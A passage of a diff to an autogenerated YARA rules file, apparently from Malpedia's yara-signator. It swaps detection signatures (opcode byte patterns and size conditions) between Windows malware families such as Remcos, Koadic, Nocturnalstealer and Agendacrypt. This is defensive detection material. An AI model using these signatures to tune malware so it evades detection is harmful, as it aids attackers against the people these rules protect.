-		$sequence_6 = { 8d85fcfeffff 68???????? 6804010000 50 ff15???????? 83c410 6a10 }
-		$sequence_7 = { 3bf3 0f8499000000 53 53 53 53 }
-		$sequence_8 = { 57 ff15???????? 83c428 33c0 5f }
-		$sequence_9 = { 6a02 57 6a01 6800000040 8d85fcfbffff }
+		$sequence_0 = { 0fa2 894704 33c9 b800000040 0fa2 }
+		$sequence_1 = { 8bf7 8d6f10 ff15???????? 0f31 }
+		$sequence_2 = { c0c003 0fb6c8 8bc1 83e10f }
+		$sequence_3 = { ff15???????? 25ffffff00 0d00000005 e9???????? 8bd7 }
+		$sequence_4 = { b800000040 0fa2 895f0c e8???????? }
+		$sequence_5 = { f7411400000020 7407 8b41f8 3901 7714 }
+		$sequence_6 = { 7512 ff15???????? 25ffffff00 0d00000007 eb4a 397b1c 7629 }
+		$sequence_7 = { f7f1 438b4cd314 4803cb 4903c9 418d0411 }
+		$sequence_8 = { 33c9 b801000080 0fa2 0fbae216 7307 }
+		$sequence_9 = { b90b010000 66394a18 8d41ed 448d59fd 440f44d8 4533c9 4c03da }
+		$sequence_10 = { 33ff 2175fc 85ff 751d }
+		$sequence_11 = { 89470c e8???????? 894708 5f 5e 5d 5b }
+		$sequence_12 = { 0fb6c3 8d95e8fdffff f7d8 1bc0 f7d0 25???????? }
+		$sequence_13 = { 57 8bfa ff15???????? 8bac2434010000 25ffffff7f 8b9c2438010000 }
+		$sequence_14 = { 8d461e 50 68???????? 8d1c31 }
+		$sequence_15 = { 8bc8 2bfa 66890c17 46 8d5202 }
+		$sequence_16 = { 6a44 5e 56 33db 8d442424 53 }
 
 	condition:
-		7 of them and filesize < 32768
+		7 of them and filesize < 107520
 }
-rule MALPEDIA_Win_Unidentified_087_Auto : FILE
+rule MALPEDIA_Win_Mindware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6032a71d-315e-5161-8b29-e52778de6b9c"
+		id = "23a8487f-e2c7-545b-81cb-6372e4caaae2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_087"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_087_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mindware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mindware_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "6f89e449c7df0d973fa61becfc3b5884b82be1e57577d3cbd257d75e0b80e7b8"
+		logic_hash = "c1e547ffdf51514bc4e27c57582e862eb5175ec80e05ba2145cb8dfa6653e95b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135393,38 +135120,32 @@ rule MALPEDIA_Win_Unidentified_087_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 498bdd 666666666666660f1f840000000000 0fb6941c98000000 498bcf e8???????? }
-		$sequence_1 = { 41b900000008 4533c0 488d5560 33c9 ff15???????? 488bf8 4885c0 }
-		$sequence_2 = { c7457001000000 c7457c02000000 488d4580 4889442428 488d85a8000000 }
-		$sequence_3 = { 4885c9 7407 ff15???????? 90 4885db }
-		$sequence_4 = { 488d0c38 4d8bc7 4903cc 4803d5 e8???????? }
-		$sequence_5 = { 4883794800 7503 83ca04 4533c0 e8???????? 488b442450 }
-		$sequence_6 = { 4883fb01 0f8288000000 488d2d0e9a0200 48833d????????10 480f432d???????? }
-		$sequence_7 = { 488d5c3bff 498d7b01 4c8bc3 8bd5 }
-		$sequence_8 = { 50 56 68???????? 57 ff15???????? 3b442410 7414 }
-		$sequence_9 = { c78550fbffff94000000 8d8d50fbffff 51 ff15???????? }
-		$sequence_10 = { 3c58 770f 0fbec2 0fbe80c8b10110 }
-		$sequence_11 = { 7429 8b5508 39542410 7412 8d442408 50 }
-		$sequence_12 = { 52 ff15???????? 32c0 e9???????? 8d8550ffffff }
-		$sequence_13 = { 57 52 53 50 ff15???????? 8b8c242c040000 }
-		$sequence_14 = { e8???????? 8bdc 57 68???????? 8d4e01 e8???????? }
-		$sequence_15 = { 0f840c010000 8b0d???????? 8b7c2458 8d44240c }
+		$sequence_0 = { 68???????? e8???????? 83c40c 8b4dfc 8b7dfc 83c72c }
+		$sequence_1 = { 50 8b4d08 8b5108 8b4508 8b12 8b4808 }
+		$sequence_2 = { c7855cecfffff8d44300 c78560ecffff00d54300 c78564ecffff0cd54300 c78568ecffff18d54300 c7856cecffff24d54300 c78570ecffff2cd54300 c78574ecffff34d54300 }
+		$sequence_3 = { c1e810 83e03f c1e918 83e13f 8b0c8d603a4400 330c8520394400 8bc2 }
+		$sequence_4 = { 33148dc0bc4400 8bcb c1e918 33148dc0c44400 8b4df0 }
+		$sequence_5 = { e8???????? 8b4dfc 51 e8???????? 8b55fc c7423000000000 8b45fc }
+		$sequence_6 = { c78540f1ffffbce04300 c78544f1ffffc4e04300 c78548f1ffffcce04300 c7854cf1ffffd4e04300 c78550f1ffffe0e04300 c78554f1ffffece04300 c78558f1fffff4e04300 }
+		$sequence_7 = { 83e03f 330c8520384400 330c95e03c4400 8bd3 33f1 c1ca04 33576c }
+		$sequence_8 = { 8b4dfc 8b7dfc 83c72c 32c0 8b4928 }
+		$sequence_9 = { 0fb689f0d84400 c1e108 33d1 8b4df0 c1e908 0fb6c9 c1e208 }
 
 	condition:
-		7 of them and filesize < 462848
+		7 of them and filesize < 661504
 }
-rule MALPEDIA_Win_Nocturnalstealer_Auto : FILE
+rule MALPEDIA_Win_Miniasp_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5964c83b-5a1b-5913-a49a-303693a90164"
+		id = "dd001a5f-6edc-54d2-8944-1f96a2068de8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nocturnalstealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miniasp_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "c662283be69db4ef7dfe1019eca1797cdbfc6ecd9828799d75f57c47594f7be3"
+		logic_hash = "d2281d1c5f13ba61fe4f1a7571230cd90a3ba2e219ba542805e8f7cc31494450"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135438,32 +135159,32 @@ rule MALPEDIA_Win_Nocturnalstealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? bd01000000 81c717a0fb5f 01ef 81ef17a0fb5f 5d 81e7cfaad32f }
-		$sequence_1 = { d280e1f107c3 7dbf 41 6c 46 3f a984011afd }
-		$sequence_2 = { e9???????? 51 b9dd9abe6f 31c8 59 05f1eb6f2f 05b354dc74 }
-		$sequence_3 = { e9???????? bb74bcf36f f7d3 4b 81cb108dfb7b 81e337e4f765 55 }
-		$sequence_4 = { c70424009d1a20 891424 ba77a7ee3f 89d3 8b1424 53 89e3 }
-		$sequence_5 = { e9???????? 58 81c404000000 e9???????? 81f6d544f73f 58 81eb4703df3d }
-		$sequence_6 = { ff3424 8b0c24 57 e9???????? 58 051ff53d3f 01c6 }
-		$sequence_7 = { f7d0 2d612e2f1b 053325461d 89c2 58 01542404 5a }
-		$sequence_8 = { e9???????? 8365d800 c745dcfedf4900 a1???????? 8d4dd8 33c1 8945e0 }
-		$sequence_9 = { e9???????? 81f2209cfd37 81eaf4ffef7d 81c2d90dace9 e9???????? 890c24 812c2439bc9f73 }
+		$sequence_0 = { 8b4de8 e8???????? 0fb6c0 85c0 742f 8b45e8 }
+		$sequence_1 = { 8a8d7bffffff 8808 8b4584 40 894584 8b4580 40 }
+		$sequence_2 = { 75ef 8b45a0 2b459c 894594 6800000010 ff7594 ff7510 }
+		$sequence_3 = { 8b45bc ffb0b4000000 8b45bc ffb088000000 8d4dfb e8???????? 8945fc }
+		$sequence_4 = { 8b45f0 ffb088000000 e8???????? 83c40c 837df800 7463 }
+		$sequence_5 = { 33c0 40 e9???????? 8b4510 25ffff0000 0fb7c0 8945b4 }
+		$sequence_6 = { 8b4dfc c6040820 8b45fc 40 8945fc }
+		$sequence_7 = { 7432 68???????? 8b45f8 ffb0e8000000 e8???????? 59 59 }
+		$sequence_8 = { 807ddf00 741f 8b45e0 8a4001 8845de 8b4de4 }
+		$sequence_9 = { 33c0 8b7df8 83c742 ab ab ab ab }
 
 	condition:
-		7 of them and filesize < 10739712
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Woody_Auto : FILE
+rule MALPEDIA_Win_Scavenger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8c748e16-00b8-5127-9604-d62e3d04f71e"
+		id = "d846177f-40f0-5608-9af6-8e72a353dfb4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.woody_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scavenger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scavenger_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "3fdba1a84cd03f528c200b6a293fddfa54111448f7301420a9273bbb05f0134b"
+		logic_hash = "e670ed837cdbf1f563e9cd77410039750eec52dd374d49f9838ffc16cf920061"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135472,37 +135193,37 @@ rule MALPEDIA_Win_Woody_Auto : FILE
 		signator_config = "callsandjumps;datarefs;binvalue"
 		malpedia_rule_date = "20260105"
 		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 33c0 83e103 c744241004010000 f3a4 bfc0a60110 83c9ff f2ae }
-		$sequence_1 = { 8d4ddc 51 ff75e8 50 ff15???????? 85c0 0f8417010000 }
-		$sequence_2 = { 83c008 83c308 3b4510 75e7 8b4604 50 894508 }
-		$sequence_3 = { 5d 5b c20800 8b5114 8b690c 8b4910 8bc2 }
-		$sequence_4 = { ff15???????? 85c0 7404 b001 5e c3 }
-		$sequence_5 = { 83c408 85f6 751e 68ee050000 50 }
-		$sequence_6 = { 5e 83c2fc 895508 895108 5d c20400 55 }
-		$sequence_7 = { 89742458 0f8c78ffffff 8b442454 8d0c92 8b542448 5f c1e102 }
-		$sequence_8 = { 8ba880000000 85ed 0f84ae000000 8b8884000000 85c9 0f84a0000000 8b443d10 }
-		$sequence_9 = { 85c0 7447 6a10 8d45e0 6a00 50 e8???????? }
+		malpedia_version = "20251219"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 0fb6c0 85c0 7421 488b442430 488b00 4889442458 488b442458 }
+		$sequence_1 = { 488b442428 48c7401800000000 488b8424a8000000 488b4010 4889442470 488b8424a8000000 4889442430 }
+		$sequence_2 = { 4889442420 488b8c2410010000 e8???????? 4839842420010000 7606 e8???????? }
+		$sequence_3 = { 4889442440 488b442430 4883c010 4889442448 }
+		$sequence_4 = { 4889442438 e9???????? 33d2 b80f000000 b902000000 48f7f1 488b4c2430 }
+		$sequence_5 = { 488b442428 48c7401800000000 488b8424a8000000 488b4010 }
+		$sequence_6 = { 4889442420 488b442420 4889442448 488b442420 4883c008 4889442450 }
+		$sequence_7 = { 4889442468 48c7442430ffffffff 488b442430 4889442478 }
+		$sequence_8 = { 488378180f 760a c744243001000000 eb08 c744243000000000 0fb6442430 88442420 }
+		$sequence_9 = { 4883ec60 488b442470 4889442448 488b442478 4889442438 488b442438 }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 2992128
 }
-rule MALPEDIA_Win_Agendacrypt_Auto : FILE
+rule MALPEDIA_Win_Buzus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4966f69d-c40f-52c7-ab6b-916949adbb8d"
+		id = "51e8e3ea-5fd9-5a65-8632-fc964a25884b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.agendacrypt_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.buzus_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "0e351b6d1fd5e325b27b4cca5ef7ee4f990f5eb0183c139b2c6519ec640c4f6c"
+		logic_hash = "45f59120d6ee3fd13d7fe4ef65dc14248ca6854e32422138403891c6247259ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135516,32 +135237,32 @@ rule MALPEDIA_Win_Agendacrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 0f8409010000 f30f7e05???????? 0f280d???????? 89442428 c744243404000000 }
-		$sequence_1 = { 8b75d4 89500c 85f6 7516 eb38 8b45e8 8b5804 }
-		$sequence_2 = { 89c3 81fba3030000 8955d8 0f84e9000000 660f1f840000000000 81fb00001100 0f8420ffffff }
-		$sequence_3 = { 8d4c2424 8d542470 e8???????? e9???????? b9???????? eb63 c744247006000000 }
-		$sequence_4 = { 8d4dec e8???????? 8b55f4 8b45ec 66c7045000ff 42 8955f4 }
-		$sequence_5 = { e8???????? 837dcc02 7211 a1???????? ff75d0 6a00 ff30 }
-		$sequence_6 = { e8???????? 8b7de8 8b75f0 8b4510 66c704772200 46 8975f0 }
-		$sequence_7 = { c745d000000000 8945f0 8d45f0 c745f490b04100 8945d8 c745dc01000000 8d45c8 }
-		$sequence_8 = { c1c20e 894dc0 8b4db4 c1c619 31d0 89fa 31f0 }
-		$sequence_9 = { f20f1145b0 894db8 742c f20f1045bc f20f104dc4 f20f114de4 f20f1145dc }
+		$sequence_0 = { 8d85d8faffff 50 ffd6 6804010000 8d85ccfdffff ff75a0 50 }
+		$sequence_1 = { 4e 46 897508 ebbd 803e2a 750b 83f801 }
+		$sequence_2 = { 59 7413 ff751c 68???????? ff36 56 e8???????? }
+		$sequence_3 = { 891d???????? 68???????? ffd5 85c0 740a c705????????01000000 }
+		$sequence_4 = { b8???????? ba???????? 89858cfcffff 8985a0fcffff b8???????? 57 c785fcfbffffc8c94000 }
+		$sequence_5 = { 8b742410 33db 33ed 3bf3 7e58 }
+		$sequence_6 = { 53 8d5904 57 6a00 ffd6 59 }
+		$sequence_7 = { c78574feffffa8cf4000 c78578feffff9ccf4000 c7857cfeffff90cf4000 c78580feffff84cf4000 c78584feffff54cf4000 c78588feffff44cf4000 c7858cfeffff2ccf4000 }
+		$sequence_8 = { 44 1573d2446b 68ded17fda ca426b 68dddb1ffb 06 9f }
+		$sequence_9 = { 5f c9 c3 e8???????? 68a5040000 ff15???????? ebee }
 
 	condition:
-		7 of them and filesize < 3340288
+		7 of them and filesize < 679936
 }
-rule MALPEDIA_Win_Ayegent_Auto : FILE
+rule MALPEDIA_Win_Socelars_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ced11e8d-8efd-5b26-929c-fa1cb31d81f3"
+		id = "3509baee-4e8c-59b5-b156-e68f4beae715"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ayegent_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.socelars_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "ba5d5de854dff7a7f643a8b1e7c7fe4de58085b126949eb8bd1d550389e21c48"
+		logic_hash = "a3ac10f2bb04512e9390a5496d935cded9fb0eddb2b0634c3c4f320efa071722"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135555,32 +135276,32 @@ rule MALPEDIA_Win_Ayegent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 8d542400 52 50 ff15???????? 8b4c2428 8b542424 }
-		$sequence_1 = { 51 6804010000 aa e8???????? 83c408 ffd5 }
-		$sequence_2 = { 885c2420 f3ab 66ab 8d4c2420 51 6804010000 aa }
-		$sequence_3 = { 770e 8088????????20 8ac8 80e920 ebe0 80a0609d400000 40 }
-		$sequence_4 = { ff15???????? 8d542420 50 52 8d442428 68???????? }
-		$sequence_5 = { 8d7c2421 885c2420 f3ab 66ab 8d4c2420 51 }
-		$sequence_6 = { 6808020000 50 53 68???????? 68???????? 885c2428 ffd5 }
-		$sequence_7 = { 66ab aa 8d442408 56 50 }
-		$sequence_8 = { 53 68???????? 8d4c2428 68???????? 51 68???????? }
-		$sequence_9 = { 66ab aa 8d442420 50 6a00 e8???????? }
+		$sequence_0 = { 8b8b88000000 394830 7f1c 8b542430 8bcb 6a00 52 }
+		$sequence_1 = { 8b432c 035514 40 837d1800 89432c 8b4f04 894c2424 }
+		$sequence_2 = { e8???????? 83c40c 894590 8b4d90 51 8d4d98 e8???????? }
+		$sequence_3 = { 8b55b8 83c202 3b5524 7735 8b4520 0345b8 0fbe08 }
+		$sequence_4 = { e8???????? c745fc00000000 8b5510 2b550c 8955d4 837dd400 766d }
+		$sequence_5 = { ff15???????? 83c404 8b4e68 85c9 7414 0fb7868c000000 3bf8 }
+		$sequence_6 = { ffd0 83c404 85c0 7417 b80a000000 5f 5e }
+		$sequence_7 = { ff75f4 03c6 89461c ff712c 50 e8???????? 8b4dfc }
+		$sequence_8 = { e9???????? 83cbff 8b4db8 83790400 0f8579ffffff c745a000000000 c7410401000000 }
+		$sequence_9 = { 8b7c2448 99 03f8 13ca 83c70a 897c2448 83d100 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 2151424
 }
-rule MALPEDIA_Win_Soundbite_Auto : FILE
+rule MALPEDIA_Win_Starsypound_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55542a6a-ff29-54af-9f72-2267cf185584"
+		id = "70e37162-3a73-596a-8d7d-42b9d85b78f7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.soundbite_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.starsypound_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "6e24536cd693eee2b46e8cd501f367ecabfbf15578ea8b1ce9e2cbd21490b0c3"
+		logic_hash = "abf4ae91c4287e1227ba24bd55f61dc3c1250c1b8b21f760166157e29806933f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135594,32 +135315,32 @@ rule MALPEDIA_Win_Soundbite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8dbd64fdffff 898590fdffff 889db7fdffff 899d64fdffff 899d68fdffff 899d6cfdffff }
-		$sequence_1 = { 51 8dbd64fdffff e8???????? c645fc02 8b13 8bb564fdffff 52 }
-		$sequence_2 = { 8d7c5702 4b ebea 3bf8 0f83b2000000 0fb707 }
-		$sequence_3 = { 0f849a010000 e8???????? 85c0 0f848d010000 8d85d8fcffff }
-		$sequence_4 = { c645fc04 8bbdf8fcffff 3bcb 0f83c9000000 8bd6 3bfa 0f87bf000000 }
-		$sequence_5 = { 898d54fdffff 898d58fdffff 8d8db7fdffff 40 51 8dbd50fdffff c685b7fdffff00 }
-		$sequence_6 = { 395de4 741d 8bc7 c1f805 83e71f c1e706 8b048500cf4200 }
-		$sequence_7 = { ff15???????? 8bf0 8d85a0fdffff e8???????? e9???????? 8bb5a8fdffff 8d85a0fdffff }
-		$sequence_8 = { 33049df02e4200 81e2ff000000 330495f03a4200 4f 0f85fcfdffff 83fe04 7250 }
-		$sequence_9 = { 85f6 0f85b3020000 50 e8???????? 83c404 8db578fdffff e8???????? }
+		$sequence_0 = { ff15???????? 8dbc2458010000 83c9ff 33c0 }
+		$sequence_1 = { 68???????? 52 e8???????? 83c420 85c0 7444 8b5304 }
+		$sequence_2 = { 53 56 57 6a18 e8???????? 8bb42424040000 }
+		$sequence_3 = { 8d4c2428 68???????? 51 e8???????? 56 8d542434 }
+		$sequence_4 = { 8bfd 8d44240c f3a5 8b5500 8b3d???????? 6a00 }
+		$sequence_5 = { 885c3438 c744241804010000 ff15???????? 8dbc2458010000 83c9ff 33c0 }
+		$sequence_6 = { 50 8d4c2424 56 51 52 }
+		$sequence_7 = { f3a4 885c0444 bf???????? 83c9ff 33c0 33f6 }
+		$sequence_8 = { 83c40c 85c0 7e2b eb08 }
+		$sequence_9 = { e8???????? 68c0270900 ff15???????? e8???????? 5f }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Remcos_Auto : FILE
+rule MALPEDIA_Win_Casper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3ceadbea-888c-55f4-a47d-fc201de9516f"
+		id = "a2a62877-f95a-5635-83dc-ecf2c1bcc8c6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.remcos_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.casper_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "53c8db12d7a75d44b5d7d131da62120ba8cecf14ac635a0e0b17a53e5078529b"
+		logic_hash = "51f38b9a318c7cdad54224577e1ce438c8182ba77e67e0978d20f3d358b38e98"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135633,32 +135354,32 @@ rule MALPEDIA_Win_Remcos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7410 6a00 ff35???????? }
-		$sequence_1 = { ff15???????? 50 ff15???????? 8d45f0 33f6 }
-		$sequence_2 = { 51 51 8d45f8 c745f808000000 50 ff15???????? ff15???????? }
-		$sequence_3 = { ff15???????? 50 ff15???????? 8d45f0 33f6 50 }
-		$sequence_4 = { 85c0 7410 6a00 ff35???????? ff15???????? }
-		$sequence_5 = { 50 6a28 ff15???????? 50 ff15???????? 8d45f0 33f6 }
-		$sequence_6 = { 7410 6a00 ff35???????? ff15???????? }
-		$sequence_7 = { 8d45f8 50 ff15???????? ff7508 }
-		$sequence_8 = { 51 8d45f8 c745f808000000 50 ff15???????? ff15???????? }
-		$sequence_9 = { 8d45f8 50 ff15???????? ff7508 ff15???????? }
+		$sequence_0 = { e8???????? 59 8d4df8 51 6a01 50 6801000080 }
+		$sequence_1 = { 88471c 8a4626 88471d 8b4624 59 c1e808 59 }
+		$sequence_2 = { 83c40c ff7010 8d8560fdffff 68???????? 50 }
+		$sequence_3 = { 832600 83661400 894608 c7461000100000 e8???????? 8945fc a1???????? }
+		$sequence_4 = { 8d8500ffffff 50 ff7510 e8???????? 83c410 8d8500ffffff 50 }
+		$sequence_5 = { 897808 eb02 33c0 8930 897804 8b4b10 }
+		$sequence_6 = { 5e 40 5b c9 c21000 8b8118010000 c3 }
+		$sequence_7 = { 8a01 84c0 75f1 8b4d08 52 ff7510 }
+		$sequence_8 = { 81e200008000 52 57 57 57 ff75a8 ff34850ca14200 }
+		$sequence_9 = { 2bc6 03450c 50 ff7508 e8???????? }
 
 	condition:
-		7 of them and filesize < 1054720
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Koadic_Auto : FILE
+rule MALPEDIA_Win_Dramnudge_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "90cb2869-83e9-5158-9659-47bf570b7e5e"
+		id = "4e1e9905-62de-5567-9ed7-a82928870a8c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.koadic_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dramnudge_auto.yar#L1-L90"
 		license_url = "N/A"
-		logic_hash = "d8659459b0b0216a7ee3a53301a133024a4e0a3aca2952b29c3bef6ea3dd8620"
+		logic_hash = "221dd8bcd930b6121a924fbe6761de15c83c657ddce0c9178183beb8828f75f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135672,32 +135393,30 @@ rule MALPEDIA_Win_Koadic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 58 89450c 8b0424 50 58 894510 }
-		$sequence_1 = { 884c3410 85db 75d4 85f6 7e0c 8a4c3410 }
-		$sequence_2 = { 89442428 ff742420 8b6c2418 58 894500 ff742424 58 }
-		$sequence_3 = { 740d 50 51 e8???????? 83c408 c20800 }
-		$sequence_4 = { ff05???????? 8934c558344100 890cc55c344100 5e c20800 55 8bec }
-		$sequence_5 = { 8bf0 e8???????? 33ff 3bc7 740a 893e 897e04 }
-		$sequence_6 = { 897e1c 3bc5 0f8490000000 8b4804 894e10 8b480c 894e18 }
-		$sequence_7 = { c21000 8b442408 48 7404 33c0 eb15 8b442404 }
-		$sequence_8 = { 58 a3???????? ff7508 58 }
-		$sequence_9 = { 6a08 ff35???????? ff15???????? 8bf0 33db 3bf3 }
+		$sequence_0 = { 014218 eb18 03c3 8bd3 }
+		$sequence_1 = { 000c00 20b140005f5f 7277 7374 }
+		$sequence_2 = { 014318 8b430c 2b4308 03c6 }
+		$sequence_3 = { 000c00 e0d9 40 007374 }
+		$sequence_4 = { 014318 8b4318 8b55f8 03d6 }
+		$sequence_5 = { 007374 643a3a 7275 6e }
+		$sequence_6 = { 0000 90 000c00 20b140005f5f }
+		$sequence_7 = { 014318 eb5b 33f6 eb01 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 1294336
 }
-rule MALPEDIA_Win_Ahtapot_Auto : FILE
+rule MALPEDIA_Win_Polpo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "30983b3b-d2d6-5541-9384-47b5921b3fc8"
+		id = "4ff250ea-14e5-5ddf-884d-81a7a2123b4c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ahtapot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ahtapot_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polpo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.polpo_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "7f340dfa857e7f52e8c2b134f735bba10e8c0df571d4ec73a1af949780ad4400"
+		logic_hash = "c5c58623683189d984bf95794fae6745283628eb524957fe3fb712a317c0fbc7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135711,32 +135430,32 @@ rule MALPEDIA_Win_Ahtapot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1fa05 8bc2 c1e81f 03d0 b814000000 2bc2 0fb7542410 }
-		$sequence_1 = { 51 8d9580fbffff 52 8d8570f7ffff 68???????? 50 ffd7 }
-		$sequence_2 = { 8d842494000000 6683383f 7508 ba20000000 668910 41 66399c4c94000000 }
-		$sequence_3 = { bf00000800 7413 893d???????? 833b02 7422 }
